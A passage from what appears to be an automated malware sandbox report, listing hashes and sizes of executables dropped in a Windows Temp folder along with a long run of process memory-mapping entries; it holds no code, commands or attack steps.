              bc735fe469f91fc2ee5fd5aa1ad11141b115f1c04c466f8cfcd8b192c137a3d24927f1d2dcd3edd5f237f17e1cdfa417e3d8c02a2865fbbe5185743f17ccdd6f

            • \Users\Admin\AppData\Local\Temp\sdame.exe
              Filesize

              556KB

              MD5

              75cd6ae901a6583211a13c768b901718

              SHA1

              ee6bd9c0443e5337d39764fa254209726469f6d8

              SHA256

              944e64b81f23985c0defc1a683806d93d5c13b131d5fa970b5124ee9634d1df0

              SHA512

              dd7a218595b092e2c46d2f8e40428dab8b83adf164ea4e520192df280f23ce7aaf248a2e0045cef8f05263bc69be94f898c096cc8c77ee7911384a3480fe4ee5

            • \Users\Admin\AppData\Local\Temp\sdame.exe
              Filesize

              556KB

              MD5

              75cd6ae901a6583211a13c768b901718

              SHA1

              ee6bd9c0443e5337d39764fa254209726469f6d8

              SHA256

              944e64b81f23985c0defc1a683806d93d5c13b131d5fa970b5124ee9634d1df0

              SHA512

              dd7a218595b092e2c46d2f8e40428dab8b83adf164ea4e520192df280f23ce7aaf248a2e0045cef8f05263bc69be94f898c096cc8c77ee7911384a3480fe4ee5

            • \Users\Admin\AppData\Local\Temp\sdame.exe
              Filesize

              556KB

              MD5

              75cd6ae901a6583211a13c768b901718

              SHA1

              ee6bd9c0443e5337d39764fa254209726469f6d8

              SHA256

              944e64b81f23985c0defc1a683806d93d5c13b131d5fa970b5124ee9634d1df0

              SHA512

              dd7a218595b092e2c46d2f8e40428dab8b83adf164ea4e520192df280f23ce7aaf248a2e0045cef8f05263bc69be94f898c096cc8c77ee7911384a3480fe4ee5

            • \Users\Admin\AppData\Local\Temp\vnbdfgfsds.exe
              Filesize

              1.0MB

              MD5

              01e485104be49a9f059e6b591273bcd1

              SHA1

              9dd25e5caa3d591537f519f6a9d0c76e1202451f

              SHA256

              6887d3d4d5baa135418c2305915c56b448960d03c427f6c63c430465ddaa6547

              SHA512

              6cb26da4a899889aba0647ec33d6c44a2c05060c8f9753259f29fdebc6b03808d0f9262207a48026f2aef96c35a51d331c04d71fbf4d45a2405ebec8bee6f5a7

            • \Users\Admin\AppData\Local\Temp\xcvtreygfsds.exe
              Filesize

              1.0MB

              MD5

              01e485104be49a9f059e6b591273bcd1

              SHA1

              9dd25e5caa3d591537f519f6a9d0c76e1202451f

              SHA256

              6887d3d4d5baa135418c2305915c56b448960d03c427f6c63c430465ddaa6547

              SHA512

              6cb26da4a899889aba0647ec33d6c44a2c05060c8f9753259f29fdebc6b03808d0f9262207a48026f2aef96c35a51d331c04d71fbf4d45a2405ebec8bee6f5a7

            • memory/668-115-0x0000000000000000-mapping.dmp
            • memory/668-135-0x0000000001E30000-0x0000000001E37000-memory.dmp
              Filesize

              28KB

            • memory/860-167-0x0000000000000000-mapping.dmp
            • memory/932-122-0x0000000000000000-mapping.dmp
            • memory/944-147-0x0000000000000000-mapping.dmp
            • memory/944-157-0x0000000004960000-0x0000000004AAC000-memory.dmp
              Filesize

              1.3MB

            • memory/944-150-0x0000000000130000-0x000000000023C000-memory.dmp
              Filesize

              1.0MB

            • memory/1076-315-0x0000000000000000-mapping.dmp
            • memory/1240-260-0x0000000000400000-0x000000000043D000-memory.dmp
              Filesize

              244KB

            • memory/1240-139-0x000000000043C0B2-mapping.dmp
            • memory/1240-145-0x0000000000400000-0x000000000043D000-memory.dmp
              Filesize

              244KB

            • memory/1240-238-0x0000000060900000-0x0000000060992000-memory.dmp
              Filesize

              584KB

            • memory/1284-313-0x0000000000000000-mapping.dmp
            • memory/1304-228-0x0000000000400000-0x000000000043D000-memory.dmp
              Filesize

              244KB

            • memory/1304-206-0x0000000000400000-0x000000000043D000-memory.dmp
              Filesize

              244KB

            • memory/1304-314-0x0000000000400000-0x000000000043D000-memory.dmp
              Filesize

              244KB

            • memory/1304-219-0x0000000000400000-0x000000000043D000-memory.dmp
              Filesize

              244KB

            • memory/1304-210-0x000000000043C0B2-mapping.dmp
            • memory/1304-296-0x0000000000400000-0x000000000043D000-memory.dmp
              Filesize

              244KB

            • memory/1312-106-0x000000000040106C-mapping.dmp
            • memory/1312-154-0x0000000000400000-0x0000000000405000-memory.dmp
              Filesize

              20KB

            • memory/1312-112-0x0000000000400000-0x0000000000405000-memory.dmp
              Filesize

              20KB

            • memory/1376-104-0x00000000763C1000-0x00000000763C3000-memory.dmp
              Filesize

              8KB

            • memory/1376-98-0x0000000000000000-mapping.dmp
            • memory/1376-108-0x0000000000240000-0x0000000000245000-memory.dmp
              Filesize

              20KB

            • memory/1412-307-0x0000000000000000-mapping.dmp
            • memory/1460-134-0x0000000000000000-mapping.dmp
            • memory/1472-237-0x0000000000400000-0x0000000000412000-memory.dmp
              Filesize

              72KB

            • memory/1472-127-0x0000000000407486-mapping.dmp
            • memory/1472-144-0x0000000000400000-0x0000000000412000-memory.dmp
              Filesize

              72KB

            • memory/1536-152-0x0000000000000000-mapping.dmp
            • memory/1536-158-0x00000000041D0000-0x000000000421C000-memory.dmp
              Filesize

              304KB

            • memory/1536-156-0x0000000000200000-0x000000000030C000-memory.dmp
              Filesize

              1.0MB

            • memory/1672-54-0x000007FEFBED1000-0x000007FEFBED3000-memory.dmp
              Filesize

              8KB

            • memory/1692-261-0x0000000000000000-mapping.dmp
            • memory/1764-230-0x0000000000000000-mapping.dmp
            • memory/1772-192-0x0000000000400000-0x0000000000412000-memory.dmp
              Filesize

              72KB

            • memory/1772-224-0x0000000000400000-0x0000000000412000-memory.dmp
              Filesize

              72KB

            • memory/1772-172-0x0000000000400000-0x0000000000412000-memory.dmp
              Filesize

              72KB

            • memory/1772-175-0x0000000000400000-0x0000000000412000-memory.dmp
              Filesize

              72KB

            • memory/1772-211-0x0000000000407486-mapping.dmp
            • memory/1772-218-0x0000000000400000-0x0000000000412000-memory.dmp
              Filesize

              72KB

            • memory/1772-184-0x0000000000400000-0x0000000000412000-memory.dmp
              Filesize

              72KB

            • memory/1772-207-0x0000000000400000-0x0000000000412000-memory.dmp
              Filesize

              72KB

            • memory/1772-197-0x0000000000400000-0x0000000000412000-memory.dmp
              Filesize

              72KB

            • memory/1920-259-0x0000000000000000-mapping.dmp
            • memory/1944-174-0x0000000000400000-0x000000000043D000-memory.dmp
              Filesize

              244KB

            • memory/1944-298-0x0000000000400000-0x000000000043D000-memory.dmp
              Filesize

              244KB

            • memory/1944-191-0x0000000000400000-0x000000000043D000-memory.dmp
              Filesize

              244KB

            • memory/1944-195-0x0000000000400000-0x000000000043D000-memory.dmp
              Filesize

              244KB

            • memory/1944-183-0x0000000000400000-0x000000000043D000-memory.dmp
              Filesize

              244KB

            • memory/1944-308-0x0000000000400000-0x000000000043D000-memory.dmp
              Filesize

              244KB

            • memory/1944-229-0x0000000000400000-0x000000000043D000-memory.dmp
              Filesize

              244KB

            • memory/1944-202-0x0000000000400000-0x000000000043D000-memory.dmp
              Filesize

              244KB

            • memory/1944-171-0x0000000000400000-0x000000000043D000-memory.dmp
              Filesize

              244KB

            • memory/1944-212-0x000000000043C0B2-mapping.dmp
            • memory/1960-225-0x0000000000400000-0x0000000000412000-memory.dmp
              Filesize

              72KB

            • memory/1960-213-0x0000000000407486-mapping.dmp
            • memory/1992-96-0x00000000028F4000-0x00000000028F7000-memory.dmp
              Filesize

              12KB

            • memory/1992-101-0x00000000028F4000-0x00000000028F7000-memory.dmp
              Filesize

              12KB

            • memory/1992-97-0x00000000028FB000-0x000000000291A000-memory.dmp
              Filesize

              124KB

            • memory/1992-95-0x000000001B6E0000-0x000000001B9DF000-memory.dmp
              Filesize

              3.0MB

            • memory/1992-102-0x00000000028FB000-0x000000000291A000-memory.dmp
              Filesize

              124KB

            • memory/1992-94-0x000007FEF2DE0000-0x000007FEF393D000-memory.dmp
              Filesize

              11.4MB

            • memory/1992-93-0x000007FEF3940000-0x000007FEF4363000-memory.dmp
              Filesize

              10.1MB

            • memory/1992-88-0x0000000000000000-mapping.dmp
            • memory/1996-168-0x00000000002C0000-0x0000000000356000-memory.dmp
              Filesize

              600KB

            • memory/1996-170-0x00000000042C0000-0x0000000004394000-memory.dmp
              Filesize

              848KB

            • memory/1996-164-0x0000000000000000-mapping.dmp
            • memory/2024-309-0x0000000000000000-mapping.dmp